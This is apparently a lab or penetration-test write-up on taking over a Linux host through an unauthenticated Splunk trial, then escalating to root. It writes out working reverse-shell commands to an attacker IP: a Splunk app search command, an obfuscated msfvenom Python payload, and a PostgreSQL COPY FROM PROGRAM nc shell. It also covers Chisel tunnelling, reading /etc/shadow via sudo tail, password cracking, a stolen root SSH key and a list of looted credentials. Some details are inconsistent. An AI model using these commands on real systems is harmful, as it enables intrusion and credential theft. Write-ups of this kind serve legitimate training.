10.110.1.123
Enumeration
- Port 8000 and port 8089 were running Splunk services.
- The Splunk installation on this machine was running a trail version, which meant that as soon as the trial expired, there was no need to enter a username and password and one could directly log into the system.
After googling a bit I came across the Splunk shell ^935c93
Exploitation
-
To get a reverse shell on the machine, one needed to upload an app downloaded from a Github repo mentioned above.
-
Once uploaded in .gz format, change the permission to “all app” and then go to the search field and enter the following command:
| revshell std 10.10.15.149 4444
The obtained reverse shell was not interactive, so to get an interactive shell, a new reverse shell python payload was created using msfvenom
msfvenom -p cmd/unix/reverse_python LHOST=10.10.15.149 LPORT=1234 R
python -c "exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNqFkN8LgjAQx/+V2NMEmc7sIWIPEgYRFaTvomuhZLvhzf8/lhs9ehzcr8/dF274GJjsBkG+ld38LMa5MxNIhegb4JNDD2gF4SlzvmM83xM/cVcEz7a5r1EsJ9kSqK+KU3O+lXUQWprV/XhpqvpRFtcorDMJWitpKXWannciUUAA2XM2GUX2GkalgfpBnK4SfJXIAmHE/xtMtuNISdINOula7En0BYiDVuU=')[0])))"
Post Exploitation
- Various system information was gathered, such as the user information (
id,sudo -l,cat /etc/passwd), system information (ipconfig,ip a,uname -a), and open ports (ss -anp). - Looking at the output of the command
netstat, it was realized that there was a postgres service running which could only be accessed from localhost. - To access the port from the Kali local machine, Chisel was used and once the postgres service could be accessed, the following blog was used to get the reverse shell:
https://medium.com/r3d-buck3t/command-execution-with-postgresql-copy-command-a79aef9c2767
proxychains psql -h 127.0.0.1 -p 5432 -U 'postgres'
CREATE TABLE shell(output text);
postgres=# COPY shell FROM PROGRAM 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.149 2020 > /tmp/f';
Once I had the Shell as postgres user, I used the software script Linpeas again and went through its output. In the output, I noticed that the user can execute the tail command as root.
I then did a quick search on GTFBINS.io and used the command mentioned there to read the files that required root access.
Based on the output of /etc/passwd and /etc/shadow, I tried to use Credential Theft and Password cracking tools to crack the password but was only able to crack the password of the user mark:toor.
I then tried to find the .ssh files for the root user and found the .ssh private key which I then used to get the reverse shell as root.
ssh root@10.10.110.123 -i id_rsa
./chisel server -p 8000 --reverse
./loot client 10.10.15.149:8000 R:socksOnce in the root shell I further carried out the post exploitation techniques to obtain the password for the postgres user which was root.
Running again the netstat command I realized that there is connection between the machien .30 and .23.
I then used tcpdump to capture the network traffic between two host and obtained following information.
Final Loot
mark:toor postgres:root sshkey for the root user admin:Zaq12wsx! for the machien .30
Three Flags 1 for Mark, 2 for Postgres and 3 for Root